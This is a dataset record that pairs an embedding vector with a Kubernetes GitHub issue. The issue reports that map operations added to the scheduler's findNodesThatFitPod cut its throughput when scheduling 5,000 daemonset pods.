-0.000594888988416642, 0.003959663212299347, -0.030529379844665527, -0.011581758968532085, -0.010372336022555828, 0.0066279093734920025, 0.009115083143115044, -0.006812397390604019, 0.010877970606088638, 0.003505275584757328, 0.025281716138124466, 0.0007464938680641353, -0.019487420096993446, 0.00793982483446598, 0.027454575523734093, -0.01355646550655365, -0.006047112867236137, 0.008438626304268837, 0.02670295722782612, 0.0033822834957391024, -0.001082159928046167, -0.011834575794637203, -0.008527453988790512, 0.016931915655732155, -0.008500122465193272, 0.004492629319429398, -0.0037785915192216635, -0.006446837447583675, 0.004328639712184668, 0.0010898469481617212, -0.01791585423052311, -0.021359633654356003, -0.007475188467651606, 0.00040634378092363477, 0.006081277504563332, -0.002125030616298318, 0.02317718416452408, 0.006088110618293285, 0.007010551169514656, -0.012312878854572773, 0.03539440035820007, 0.014130429364740849, 0.021701278164982796, 0.031321994960308075, 0.007953491061925888, 0.004810358863323927, 0.0006059924489818513, 0.0013597463257610798, -0.019842730835080147, 0.005623473320156336, -0.019323430955410004, -0.005637139081954956, 0.0012367542367428541, 0.02323184721171856, 0.009299571625888348, 0.014198757708072662, -0.0036487665493041277, 0.019145775586366653, -0.006296513602137566, 0.005715717561542988, 0.013515468686819077, -0.007482021115720272, 0.025432039052248, 0.01026984304189682, 0.015251023694872856, 0.006549330893903971, -0.004253477789461613, 0.005647388752549887, -0.0021762773394584656, 0.005271579138934612, -0.0065561640076339245, -0.004540459252893925, 0.015374016016721725, 0.004314973950386047, 0.009928197599947453, -0.008472790941596031, 0.0009634383604861796, 0.006539081688970327, -0.00811748020350933, 0.02435244247317314, 0.00035765941720455885, 0.025869345292448997, -0.02801487408578396, -0.013563298620283604, -0.020512353628873825, -0.011199116706848145, -0.004130485467612743, -0.011151286773383617, -0.03605036064982414, 0.010713981464505196, 0.008069650270044804, 0.015374016016721725, -0.005032428074628115, 0.008049151860177517, 0.007748504169285297, 0.0005961701972410083, 0.010365502908825874, -0.011294777505099773, -0.0005299765034578741, 0.03044738434255123, -0.017806526273489, 0.003935748245567083, 0.016849922016263008, -0.00011679981980705634, -0.01421242393553257, 0.02812420018017292, -0.028889484703540802, -0.015456010587513447, 0.023313840851187706, -0.008083316497504711, -0.008192642591893673, 0.009846203029155731, 0.011144453659653664, -0.0013042290229350328, 0.03110334277153015, -0.024817079305648804, 0.01230604574084282, 0.004745446145534515, 0.01660393737256527, 0.008493290282785892, -0.004376470111310482, -0.00232830923050642, 0.009367900900542736, 0.0062076859176158905, -0.026197323575615883, 0.0019337096018716693, 0.013112328015267849, -0.000022900878320797347, -0.0002466248406562954, -0.011219615116715431, -0.011923403479158878, -0.00018107175128534436, -0.01910477690398693, -0.008349798619747162, -0.005695218686014414, 0.0008558202534914017, 0.020744672045111656, 0.009156080894172192, 0.006600577384233475, 0.004041658248752356, 0.003015015507116914, -0.0019439589232206345, 0.022794540971517563, -0.0181618370115757, 0.007174540776759386, -0.004280809313058853, -0.00394258089363575, 0.0008916929364204407, -0.0032234187237918377, -0.008664112538099289, -0.01768353581428528, -0.010584156028926373, 0.0018875875975936651, 0.0029022726230323315, 0.02376481331884861, -0.020143378525972366, 0.004677117336541414, 0.019364427775144577, 0.002628956688567996, -0.00409290473908186, -0.014731723815202713, -0.022070255130529404, -0.006610827054828405, -0.005596141796559095, 0.007652843836694956, 0.01809350959956646, -0.002148945815861225, -0.0028168614953756332, -0.025992337614297867, -0.006590328179299831, 0.007796334568411112, 0.001546796876937151, -0.011957568116486073, 0.0030423470307141542, 0.032223936170339584, 0.0035496894270181656, -0.0005235706339590251, 0.01126061286777258, 0.007591347675770521, 0.006603993941098452, -0.014677060768008232, 0.012347043491899967, -0.030119406059384346, -0.0026187074836343527, 0.007311198860406876, 0.011076124384999275, 0.004314973950386047, -0.0032490422017872334, 0.004109987057745457, -0.020635345950722694, -0.024858076125383377, 0.016863588243722916, -0.006221351679414511, -0.01492304541170597, -0.03564038500189781, -0.00513492152094841, 0.01489571388810873, 0.0052339984104037285, 0.026142660528421402, -0.015155363827943802, 0.030556710436940193, 0.02077200450003147, -0.00007767081115162, 0.0016569773433730006, 0.028862152248620987, -0.04061473533511162, 0.02107265219092369, -0.010905302129685879, -0.003146548755466938, -0.004571207333356142, -0.015838652849197388, 0.0230405256152153, -0.008219974115490913, -0.004072405863553286, 0.007427358068525791, 0.03823688626289368, -0.0030525962356477976, 0.010235678404569626, -0.009627550840377808, 0.019501086324453354, -0.015333019196987152, 0.011902905069291592, -0.00670307083055377, -0.01471805851906538, 0.009381566196680069, 0.010918968357145786, -0.010488495230674744, -0.011226448230445385, 0.00667232321575284, -0.0027451158966869116, -0.017232563346624374, 0.009771041572093964, 0.020512353628873825, -0.038783516734838486, 0.02060801535844803, -0.006077860947698355, 0.0009284197585657239, 0.029463447630405426, -0.023067858070135117, -0.023792143911123276, -0.019993053749203682, -0.019432757049798965, -0.0028527341783046722, 0.006621076259762049, -0.01905011385679245, 0.0072223711758852005, -0.0000031328561362897744, 0.011896071955561638, -0.004605371970683336, -0.007953491061925888, 0.0010351837845519185, 0.004663451574742794, -0.004554125014692545, 0.0038025067187845707, -0.005490231793373823, 0.024325110018253326, -0.036815643310546875, 0.012135223485529423, 0.0009813746437430382, -0.0032097529619932175, 0.01917310617864132, 0.010304007679224014, 0.005818211007863283, 0.005647388752549887, -0.028315521776676178, -0.00619402015581727, 0.0075503503903746605, -0.01385711319744587, -0.011226448230445385, 0.006532248575240374, 0.02043035998940468, -0.02651163749396801, -0.005746465642005205, 0.021988259628415108, -0.009716378524899483, -0.016494611278176308, -0.0029620605055242777, 0.00534332450479269, 0.009859869256615639, -0.00737269502133131, 0.006426338572055101, 0.01441741082817316, -0.045179110020399094, -0.022657884284853935, -0.012934672646224499, -0.00908091850578785, 0.03348119184374809, 0.005965118296444416, -0.009525056928396225, -0.00006576662417501211, 0.004222729708999395, 0.021878933534026146, 0.01593431457877159, -0.008349798619747162, -0.021045319736003876, -0.0030167235527187586, 0.02847951091825962, -0.00510758999735117, 0.012224051170051098, -0.007837331853806973, -0.015005039982497692, -0.006528832018375397, 0.028233526274561882, -0.0065151662565767765, 0.0005867749569006264, 0.010953132063150406, -0.005596141796559095, 0.013631627894937992, -0.005743049085140228, -0.02567802369594574, -0.020922327414155006, 0.0031567979604005814, -0.00334299448877573, 0.006815813947468996, 0.0010394543642178178, 0.02263055182993412, 0.027140263468027115, 0.0011368230916559696, -0.0007789501687511802, -0.0020191208459436893, 0.002871524542570114, -0.02334117330610752, -0.02621098980307579, -0.0068943919613957405, 0.002357349032536149, 0.007174540776759386, 0.021345967426896095, -0.026948941871523857, -0.00012363270798232406, 0.00497093191370368, -0.012914173305034637, -0.020457690581679344, -0.006361426319926977, -0.004287642426788807, -0.026907945051789284, -0.0075503503903746605, -0.01119228359311819, 0.005029011517763138, -0.022712547332048416, -0.004622454289346933, 0.012148888781666756, 0.0006777378730475903, -0.0014349081320688128, -0.01039283536374569, 0.01334464643150568, -0.02447543293237686, 0.00464295269921422, 0.013494969345629215, 0.011718416586518288, -0.028752826154232025, -0.0247214175760746, 0.031158005818724632, -0.015524339862167835, -0.007523018401116133, -0.030502047389745712, 0.006737235467880964, 0.013481304049491882, -0.005442401859909296, -0.0005171648226678371, -0.01570199429988861, -0.03930281847715378, 0.01671326346695423, 0.012374375015497208, -0.008124313317239285, 0.010590989142656326, 0.004502878524363041, -0.0006730402819812298, -0.008807603269815445, 0.002675078809261322, -0.021646615117788315, -0.005763547960668802, 0.033645179122686386, -0.0006610826821997762, 0.016262292861938477, 0.009921365417540073, -0.01839415542781353, -0.0021045319736003876, 0.006911474280059338, 0.01623496040701866, -0.012825345620512962, -0.0025982088409364223, 0.014554068446159363, -0.005042677279561758, 0.015688329935073853, -0.005667887162417173, 0.028889484703540802, -0.013132826425135136, 0.025213386863470078, 0.0005406528944149613, 0.017943184822797775, 0.0054492345079779625, 0.00300818239338696, 0.0181618370115757, -0.02018437534570694, -0.010488495230674744, -0.01731455884873867, 0.03170463815331459, -0.0007332551758736372, 0.01736922189593315, -0.007215538062155247, -0.012975669465959072, 0.004728364292532206, -0.007741671055555344, 0.007714339531958103, 0.005903622135519981, 0.012422204948961735, -0.00979153998196125, 0.013125993311405182, 0.022056588903069496, -0.0008746106759645045, -0.022890202701091766, -0.0033395779319107533, -0.007570848800241947, 0.00317217200063169, -0.027386248111724854, 0.014103097841143608, 0.021236641332507133, -0.000026370707928435877, 0.0025350044015794992, -0.009511391632258892, -0.010884803719818592, -0.003076511435210705, 0.009777874685823917, -0.0015783989802002907, 0.00265628844499588, -0.019747069105505943, 0.013119160197675228, 0.013720455579459667, 0.010754978284239769, -0.0020618264097720385, 0.02435244247317314, 0.0015886483015492558, 0.003358368529006839, -0.007864663377404213, -0.01594797894358635, 0.005876290611922741, 0.02645697444677353, 0.0061359405517578125, -0.004424300044775009, -0.022083919495344162, 0.011445101350545883, -0.0015160487964749336, 0.0017765529919415712, -0.006129107903689146, 0.019022783264517784, -0.0019080862402915955, -0.004185148980468512, 0.00205328525044024, -0.006532248575240374, 0.03572238236665726, 0.007010551169514656, 0.00618035439401865, 0.01821650005877018, -0.028588837012648582, -0.007919326424598694, 0.006812397390604019, -0.006361426319926977, -0.004335472360253334, 0.017765529453754425, 0.0013674333458766341, 0.0028305272571742535, -0.010775476694107056, -0.0013093537418171763, 0.009203910827636719, 0.02077200450003147, -0.006361426319926977, 0.00884176790714264, 0.011779912747442722, -0.014731723815202713, 0.013474470935761929, -0.011861907318234444, 0.0052339984104037285, 0.020526019856333733, -0.006375092081725597, -0.01587964966893196, 0.01593431457877159, -0.010263009928166866, 0.007721172645688057, 0.02580101601779461, -0.003237084485590458, 0.01665860041975975, 0.008964759297668934, 0.013153324835002422, -0.02179693803191185, 0.010556824505329132, -0.004543875809758902, -0.011807244271039963, 0.022616885602474213, -0.02387413941323757, -0.00300818239338696, -0.008957927115261555, -0.0039118328131735325, 0.017410218715667725, 0.006802148185670376, 0.003414739854633808, 0.010358670726418495, 0.011574925854802132, 0.018120840191841125, 0.02383314073085785, -0.010652485303580761, -0.00871877558529377, 0.009504558518528938, 0.0008985258173197508, -0.01320115476846695, -0.01928243227303028, 0.016439948230981827, -0.004444798920303583, 0.01068664900958538, -0.007618679199367762, -0.015360350720584393, 0.005845542531460524, -0.003949414007365704, 0.005339908413589001, -0.00102664262522012, 0.0030235564336180687, -0.007748504169285297, -0.0037307613529264927, 0.013768285512924194, 0.011527095921337605, -0.009689047001302242, 0.0028202778194099665, 0.017820192500948906, 0.007769003044813871, 0.006036863662302494, -0.019309764727950096, -0.0070788804441690445, 0.01337197795510292, -0.003143132198601961, -0.01021517999470234, -0.0016552690649405122, -0.008281470276415348, 0.002278770785778761, -0.02681228332221508, -0.014772721566259861, -0.016166632995009422, 0.006303346715867519, -0.03618701919913292, -0.0034027821384370327, 0.0026665376499295235, -0.012695521116256714, -0.023505162447690964, 0.016467278823256493, 0.010768644511699677, -0.004345722030848265, -0.005186168011277914, 0.01047482993453741, 0.008411294780671597, 0.0001955916523002088, -0.005842125974595547, 0.0012606693198904395, 0.008336133323609829, 0.005049510393291712, 0.002177985617890954, 0.020990656688809395, 0.013474470935761929, 0.006009532138705254, 0.017779195681214333, -0.009921365417540073, -0.011294777505099773, -0.007707506883889437, 0.011199116706848145, -0.004660035017877817, -0.0000120910235636984, 0.007447856944054365, -0.0005257059237919748, 0.005729383323341608, 0.01689091883599758, 0.012094225734472275, 0.020252704620361328, -0.01981539838016033, -0.005435568746179342, -0.0199383907020092, 0.021154645830392838, 0.004342305473983288, -0.005702051799744368, 0.0060641951858997345, -0.005182751454412937, -0.00014946960436645895, -0.03618701919913292, -0.005483399145305157, -0.004437965806573629, -0.005825044121593237, 0.0072223711758852005, -0.01113762054592371, 0.02186526730656624, 0.01607097126543522, -0.006197436712682247, -0.04299258068203926, -0.01654927432537079, -0.006457086652517319, -0.024092791602015495, 0.011472432874143124, 0.004680533893406391, -0.015046036802232265, 0.0005376635235734284, 0.006419505923986435, 0.012825345620512962, 0.012900508008897305, 0.015483342111110687, 0.006176937837153673, 0.007051548920571804, -0.0243661068379879, -0.0029483947437256575, 0.005896789487451315, 0.005688386037945747, 0.013385643251240253, 0.01820283569395542, -0.008288303390145302, 0.014950376935303211, 0.006737235467880964, 0.023573491722345352, 0.009087751619517803, -0.0016586855053901672, 0.005527812987565994, 0.015333019196987152, -0.0022377735003829002, -0.008397629484534264, 0.009497725404798985, -0.011923403479158878, -0.027468241751194, -0.003126049879938364, -0.01695924811065197, 0.018667472526431084, 0.0008079899707809091, -0.0031209252774715424, -0.0049845976755023, 0.01564733125269413, 0.015497008338570595, -0.00908091850578785, 0.0005573080852627754, 0.014280753210186958, -0.0016441656043753028, 0.030146736651659012, 0.003915249370038509, 0.018284829333424568, 0.005599558353424072, -0.003486485220491886, 0.024994734674692154, 0.021632948890328407, 0.000984791200608015, 0.011274278163909912, 0.01899545080959797, 0.00247863307595253, -0.01060465443879366, 0.024940071627497673, 0.0007080588839016855, -0.01773819886147976, -0.01928243227303028, -0.012271881103515625, -0.017273562029004097, -0.01391177624464035, -0.01706857420504093, 0.012203552760183811, 0.023245511576533318, 0.00007249275950016454, -0.012408539652824402, -0.021332301199436188, 0.0010420166654512286, -0.003945997450500727, -0.015592669136822224, -0.028288189321756363, -0.0031380075961351395, 0.019747069105505943, -0.017464881762862206, 0.0188724584877491, 0.01068664900958538, -0.01965140923857689, 0.03301655501127243, -0.006399007048457861, 0.000010109216418641154, -0.00809014867991209, -0.03492976352572441, 0.004895769990980625, 0.01976073533296585, -0.004390135873109102, -0.0030799279920756817, -0.009169746190309525, 0.0009463561000302434, -0.0012444412568584085, 0.012025897391140461, 0.007891994901001453, -0.0006687697023153305, 0.013993770815432072, 0.008664112538099289, 0.007270201575011015, 0.024434436112642288, 0.005814794450998306, 0.00512125575914979, 0.013392476364970207, -0.005746465642005205, -0.02979142777621746, -0.007557183038443327, 0.0029193549416959286, 0.008985258638858795, -0.006009532138705254, -0.01784752495586872, -0.01024251151829958, 0.007652843836694956, 0.002024245448410511, -0.003587270388379693, -0.01406210009008646, -0.008725608699023724, 0.004967515356838703, -0.009675380773842335, 0.003155089681968093, -0.007605013437569141, -0.007577681913971901, -0.003823005361482501, 0.006351177114993334, 0.008219974115490913, -0.0016638102242723107, -0.0007033612346276641, -0.01436274778097868, 0.014800053089857101, 0.009579719975590706, -0.00015000342682469636, -0.00735902925953269, 0.019569413736462593, 0.01981539838016033, -0.017656203359365463, 0.004560958128422499, 0.011629588901996613, 0.012640858069062233, -0.012319711968302727, 0.029654769226908684, -0.001906377961859107, 0.010536326095461845, -0.006241850554943085, 0.0008096981910057366, 0.020881330594420433, -0.001978123327717185, -0.007762169931083918, 0.0011351148132234812, -0.0008771730354055762, -0.02478974685072899, -0.031567979604005814, -0.005626889877021313, -0.041052039712667465, -0.002811736660078168, -0.00667573930695653, 0.009497725404798985, 0.007277034223079681, 0.009873534552752972, 0.02734524942934513, -0.013891277834773064, 0.013248985633254051, -0.025486702099442482, -0.010078521445393562, -0.0033925329335033894, -0.009668547660112381, -0.0024308026768267155, 0.0035462731029838324, -0.006638158578425646, 0.006849978119134903, -0.008049151860177517, -0.012640858069062233, 0.005169085692614317, 0.009402064606547356, 0.02167394571006298, -0.0009958946611732244, 0.022603219375014305, -0.013119160197675228, 0.01844882033765316, 0.019569413736462593, -0.0025691690389066935, 0.0033532436937093735, -0.027140263468027115, -0.009873534552752972, 0.007147209253162146, -0.004174899309873581, -0.010365502908825874, 0.0010155391646549106, 0.0009369608596898615, 0.001602314179763198, -0.011650088243186474, 0.00461220508441329, 0.008547953329980373, -0.008247305639088154, -0.008752940222620964, -0.00482060806825757, 0.02227524109184742, 0.010345004498958588, -0.018845127895474434, -0.012189886532723904, -0.03009207360446453, -0.010365502908825874, -0.005356990732252598, -0.010044356808066368, 0.004226146265864372, 0.009552388451993465, -0.00055602693464607, -0.009279073216021061, -0.006897808518260717, -0.009525056928396225, -0.01575665920972824, -0.004161233548074961, 0.002089157933369279, 0.009135582484304905, -0.011902905069291592, 0.008588950149714947, -0.005620057228952646, 0.0161256343126297, 0.007810000330209732, 0.005712301004678011, 0.0031499650795012712, -0.013699956238269806, -0.010720813646912575, 0.011759414337575436, -0.002693869173526764, -0.015374016016721725, 0.017177900299429893, -0.015920648351311684, -0.016439948230981827, -0.017000244930386543, -0.015975311398506165, 0.013720455579459667, 0.012381208129227161, 0.00991453230381012, 0.0028954397421330214, -0.030146736651659012, -0.004537043161690235, -0.015319352969527245, 0.000676883792039007, -0.004858189262449741, -0.007762169931083918, -0.009689047001302242, 0.00601636478677392, -0.012169388122856617, -0.0031977954786270857, 0.0010847222292795777, 0.0065356651321053505, 0.00482060806825757, 0.00851378869265318, -0.000033710733987390995, -0.007454689592123032, -0.002095990814268589, 0.021509956568479538, 0.005158836487680674, -0.002775863977149129, 0.0076733422465622425, -0.005251080729067326, 0.0004928226117044687, -0.00844545941799879, -0.005842125974595547, -0.005100756883621216, -0.001151342992670834, -0.0010650777257978916, 0.004605371970683336, -0.02114097960293293, -0.0069661373272538185, -0.0036897638346999884, 0.0023522244300693274, 0.0099691953510046, 0.0005923266871832311, -0.00021683768136426806, -0.01215572189539671, -0.013433474116027355, -0.007577681913971901, 0.02222057804465294, -0.012429038062691689, -0.01725989580154419, 0.01335147861391306, 0.03178663179278374, 0.0006047112983651459, 0.021482625976204872, 0.00579429604113102, -0.00889643095433712, 0.002468383638188243, 0.000040730465116212144, 0.016672266647219658, -0.023259177803993225, 0.00901942327618599, 0.004431133158504963, -0.013426641002297401, 0.006477585528045893, 0.01839415542781353, -0.009566054679453373, -0.000879735394846648, 0.016508277505636215, -0.003508692141622305, -0.008602616377174854, 0.015100700780749321, -0.026839615777134895, 0.019924724474549294, -0.006863643880933523, -0.015428679063916206, 0.002553794998675585, -0.013747787103056908, -0.01128794439136982, -0.004977765027433634, -0.001899545080959797, -0.0031209252774715424, 0.009039921686053276, -0.0029911003075540066, 0.016098303720355034, 0.006036863662302494, -0.016016308218240738, 0.0010146850254386663, -0.0059924498200416565, -0.008397629484534264, 0.007249702699482441, 0.010071689262986183, -0.016754260286688805, -0.006200853269547224, -0.004755695816129446, 0.002010579686611891, -0.002622123807668686, 0.007844164967536926, -0.006354593206197023, 0.0027980708982795477, -0.005490231793373823, 0.0076938411220908165, -0.0032712488900870085, 0.009921365417540073, 0.02442076988518238, -0.008069650270044804, -0.016316955909132957, -0.00667232321575284, -0.00546631682664156, 0.0010386002250015736, 0.025350043550133705, -0.00035787292290478945, 0.026484305039048195, -0.026470638811588287, 0.009859869256615639, -0.009128749370574951, 0.009866702370345592, -0.012654523365199566, 0.0027246172539889812, 0.014636063016951084, -0.03482043743133545, -0.021236641332507133, -0.013440306298434734, 0.004267143551260233, 0.012763849459588528, -0.008096981793642044, -0.0006828625337220728, -0.007557183038443327, 0.014786386862397194, 0.017533211037516594, 0.0045677912421524525, -0.0012290672166272998, -0.002871524542570114, 0.002456426154822111, -0.02287653647363186, -0.016166632995009422, 0.004967515356838703, 0.006764566991478205, -0.004478963557630777, -0.004335472360253334, -0.020280035212635994, -0.00022164206893648952, -0.013665792532265186, -0.0028339435812085867, 0.0057054683566093445, 0.013570131734013557, -0.015360350720584393, 0.0322512686252594, 0.002379555953666568, -0.01570199429988861, -0.009169746190309525, -0.02759123407304287, 0.010590989142656326, 0.01695924811065197, -0.02962743677198887, 0.025049397721886635, -0.01798418164253235, 0.0013734120875597, -0.0008592366939410567, 0.0034830686636269093, 0.024407105520367622, 0.04239128902554512, -0.010365502908825874, 0.029818758368492126, 0.03949413821101189, 0.024639423936605453, 0.006187187507748604, 0.0008848600555211306, -0.0008592366939410567, 0.004352554678916931, 0.009982861578464508, -0.021714944392442703, -0.012777515687048435, -0.007229203823953867, -0.0003192243748344481, -0.021113649010658264, 0.01630328968167305, 0.03033805824816227, 0.006747484672814608, 0.009757375344634056, 0.0010027275420725346, 0.031158005818724632, 0.02429777756333351, -0.0031140923965722322, 0.006460503209382296, 0.0007007989333942533, -0.0023812642320990562, -0.0026545801665633917, -0.017300892621278763, -0.026648294180631638, 0.003963079769164324, 0.018845127895474434, 0.015128032304346561, 0.03312588110566139, 0.012456369586288929, 0.00907408632338047, 0.018667472526431084, 0.007973989471793175, 0.01766986958682537, -0.010645652189850807, -0.017929518595337868, -0.0034676948562264442, -0.02979142777621746, -0.012880008667707443, 0.0059207044541835785, 0.001307645463384688, -0.02060801535844803, -0.015469676814973354, 0.015797656029462814, -0.008001320995390415, 0.00976420845836401, -0.00949089229106903, 0.008554785512387753, 0.0029501027893275023, 0.022056588903069496, 0.004431133158504963, -0.01917310617864132, -0.008862266317009926, -0.01624862663447857, 0.019186772406101227, 0.02842484787106514, 0.010399667546153069, -0.008657279424369335, 0.01868113875389099, 0.019733404740691185, 0.002331725787371397, -0.021810604259371758, 0.0030799279920756817, 0.01316699106246233, -0.00716770812869072, -0.01708224043250084, 0.002943269908428192, 0.01167058665305376, -0.010850639082491398, 0.00006379149272106588, -0.00703105004504323, -0.005309160333126783, 0.00923124235123396, 0.007953491061925888, -0.004161233548074961, 0.005418486427515745, 0.011609090492129326, -0.008042318746447563, -0.00015000342682469636, 0.004045074339956045, 0.02686694823205471, -0.0010966798290610313, 0.012189886532723904, -0.00940889772027731, 0.012374375015497208, -0.004981181118637323, -0.02101798914372921, 0.0181618370115757, -0.005544895306229591, 0.009921365417540073, -0.006286264397203922, -0.0072223711758852005, 0.0017065157881006598, 0.00392891513183713, -0.004721531178802252, -0.01864014007151127, 0.015196360647678375, -0.004571207333356142, -0.013795617036521435, -0.005428736098110676, 0.009805206209421158, -0.0035394402220845222, 0.017656203359365463, -0.0027809888124465942, -0.0020088714081794024, 0.004554125014692545, 0.010830140672624111, -0.017656203359365463, 0.0012094225967302918, 0.025240717455744743, -0.02943611703813076, -0.012955171056091785, 0.010037524625658989, 0.012593027204275131, 0.004697616212069988, -0.006060778629034758, -0.0034215727355331182, -0.017902188003063202, 0.018298495560884476, 0.008219974115490913, -0.009115083143115044, -0.008049151860177517, 0.004868438467383385, 0.004841106943786144, 0.012107891961932182, -0.029108136892318726, 0.008670944720506668, 0.0175468772649765, -0.022083919495344162, 0.02477608062326908, -0.0010548282880336046, -0.0016262292629107833, 0.006108609028160572, -0.002958643948659301, 0.004287642426788807, -0.014909379184246063, 0.0018175503937527537, 0.0082404725253582, 0.007919326424598694, 0.012265048921108246, 0.0004415759176481515, -0.002511089202016592, 0.009579719975590706, -0.018312161788344383, -0.00315850623883307, 0.01418509241193533, -0.008793937042355537, -0.042555276304483414, -0.006108609028160572, 0.005097340326756239, -0.0048547727055847645, 0.016808925196528435, 0.005934370215982199, 0.031130675226449966, -0.010850639082491398, 0.007823665626347065, 0.014636063016951084, -0.03380917012691498, -0.010160516016185284, -0.0001067106204573065, 0.012107891961932182, -0.010912135243415833, -0.006583495531231165, -0.009456728585064411, 0.008807603269815445, 0.002632373245432973, -0.010167349129915237, -0.003498442703858018, 0.0199383907020092, 0.00532965874299407, -0.015674663707613945, 0.0019627492874860764, -0.022712547332048416, 0.005374072585254908, 0.02328651025891304, -0.0030269729904830456, -0.007803167216479778, 0.0236554853618145, 0.003672681748867035, 0.012647690251469612, 0.01976073533296585, -0.017751863226294518, -0.00046122047933749855, 0.00886909943073988, -0.019596746191382408, 0.000745639787055552, -0.0033669094555079937, -0.023737480863928795, -0.021509956568479538, 0.03766292333602905, -0.026197323575615883, -0.003430113894864917, 0.008711942471563816, -0.015141697600483894, 0.010187848471105099, -0.004400385078042746, -0.02280820719897747, -0.0036111855879426003, -0.013228487223386765, -0.026497971266508102, -0.00039139683940447867, 0.009730043821036816, -0.0031670473981648684, -0.004718114621937275, -0.0033634931314736605, 0.001402451889589429, -0.0007806583889760077, -0.013385643251240253, -0.0022907285019755363, -0.003308829851448536, -0.0023095188662409782, 0.004379886202514172, -0.00615302287042141, 0.00547998258844018, 0.0009856452234089375, -0.008964759297668934, -0.009798373095691204, -0.0043833027593791485, -0.011622755788266659, -0.01152026280760765, 0.015182695351541042, -0.002692161127924919, -0.012900508008897305, 0.017273562029004097, 0.01113762054592371, -0.0009463561000302434, 0.0067714001052081585, -0.01798418164253235, 0.0032627079635858536, 0.010741312988102436, -0.008288303390145302, 0.006767983548343182, -0.010713981464505196, -0.0028134449385106564, 0.025691689923405647, 0.01587964966893196, -0.007523018401116133, 0.005264746490865946, 0.008014987222850323, -0.008992090821266174, 0.012722852639853954, 0.0029842674266546965, 0.03164997324347496, 0.002439343836158514, -0.0016014600405469537, 0.007844164967536926, -0.015059703029692173, -0.0055927252396941185, -0.017164234071969986, -0.013501802459359169, -0.000994186382740736, -0.009511391632258892, 0.008752940222620964, -0.01143826823681593, 0.0038503368850797415, 0.018489817157387733, 0.03345385938882828, 0.007960324175655842, 0.0021164894569665194, 0.00531599298119545, 0.01421242393553257, -0.002036202931776643, -0.01702757738530636, 0.0008635072153992951, -0.033235207200050354, 0.009682213887572289, 0.007249702699482441, -0.008042318746447563, 0.011431435123085976, -0.004338888917118311, -0.012552030384540558, -0.007755337283015251, -0.0018978369189426303, -0.016808925196528435, -0.009730043821036816, -0.010160516016185284, 0.001752637792378664, -0.014198757708072662, 0.01814817264676094, 0.021755941212177277, 0.01489571388810873, -0.0006388757610693574, -0.004772778134793043, -0.004376470111310482, 0.008978425525128841, 0.019063780084252357, -0.016084637492895126, -0.008752940222620964, 0.00359751982614398, 0.010372336022555828, -0.007126710843294859, -0.03607769310474396, -0.00039758914499543607, -0.007980822585523129, -0.005391154903918505, 0.008021820336580276, -0.016972914338111877, -0.004352554678916931, 0.002497423440217972, -0.007605013437569141, 0.03309854865074158, -0.00027331584715284407, -0.014882047660648823, 0.016111968085169792, -0.0014929877361282706, 0.0008771730354055762, 0.008411294780671597, 0.027386248111724854, 0.00964121613651514, -0.0013460805639624596, 0.008609449490904808, 0.022124918177723885, -0.027632230892777443, -0.01981539838016033, -0.02693527564406395, 0.004226146265864372, -0.016043640673160553, 0.022302573546767235, 0.002181402174755931, -0.004765945021063089, 0.0054697333835065365, 0.00720870541408658, -0.0026631213258951902, 0.013392476364970207, 0.0007755337283015251, 0.0009813746437430382, 0.010440665297210217, 0.010167349129915237, 0.006904641631990671, -0.00826780404895544, 0.07948024570941925, 0.010953132063150406, -0.016590271145105362, -0.006238433998078108, 0.018940787762403488, -0.00013025208318140358, -0.012880008667707443, -0.01340614166110754, -0.03277057036757469, 0.01101462822407484, 0.02286287024617195, 0.014813718385994434, 0.02006138302385807, -0.00616668863222003, 0.006846562027931213, 0.00652199937030673, 0.012620358727872372, -0.000611544179264456, 0.013501802459359169, 0.026784952729940414, 0.019337095320224762, -0.009135582484304905, 0.004031408578157425, 0.004328639712184668, 0.01564733125269413, 0.005913871340453625, 0.003870835527777672, 0.0032712488900870085, -0.0006316158105619252, 0.008322467096149921, -0.009784706868231297, -0.008875931613147259, -0.00931323692202568, 0.013795617036521435, 0.0058694579638540745, 0.014116763137280941, 0.008725608699023724, 0.0016492903232574463, -0.01184824202209711, 0.01898178458213806, 0.00032200023997575045, -0.007775835692882538, -0.009197077713906765, -0.0034591536968946457, -0.010372336022555828, -0.00616668863222003, -0.01899545080959797, 0.014786386862397194, -0.008137979544699192, -0.009354234673082829, 0.004267143551260233, -0.009429396130144596, -0.0009736876818351448, 0.009771041572093964, -0.010051189921796322, -0.009162914007902145, 0.005114422645419836, 0.013904943130910397, -0.020157042890787125, -0.008049151860177517, -0.01589331589639187, 0.008807603269815445, 0.01940542459487915 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
### What happened? https://github.com/kubernetes/kubernetes/pull/119779 added some map queries and creations that add non-negligible latency. The pprof reveals the following lines inside `findNodesThatFitPod` as too expensive: - 22.2% https://github.com/kubernetes/kubernetes/blob/44bd04c0cbddde69aaeb7a90d3bd3de4e417f27f/pkg/scheduler/schedule_one.go#L492 - 21.7% https://github.com/kubernetes/kubernetes/blob/44bd04c0cbddde69aaeb7a90d3bd3de4e417f27f/pkg/scheduler/schedule_one.go#L489 ![image](https://github.com/kubernetes/kubernetes/assets/1299064/d82a658e-ae01-4bcd-9e0d-6ab892bee6c2) ### What did you expect to happen? Scheduler to keep a throughput of 300 pods/s ### How can we reproduce it (as minimally and precisely as possible)? Schedule 5k daemonset pods giving 300 qps to the scheduler ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version # paste output here ``` v1.30 </details> ### Cloud provider <details> GKE </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release # paste output here $ uname -a # paste output here # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details>
Throughput degradation scheduling daemonset pods
https://api.github.com/repos/kubernetes/kubernetes/issues/124709/comments
26
2024-05-06T17:26:20
2024-06-21T07:49:14Z
https://github.com/kubernetes/kubernetes/issues/124709
2,281,369,549
124,709
false
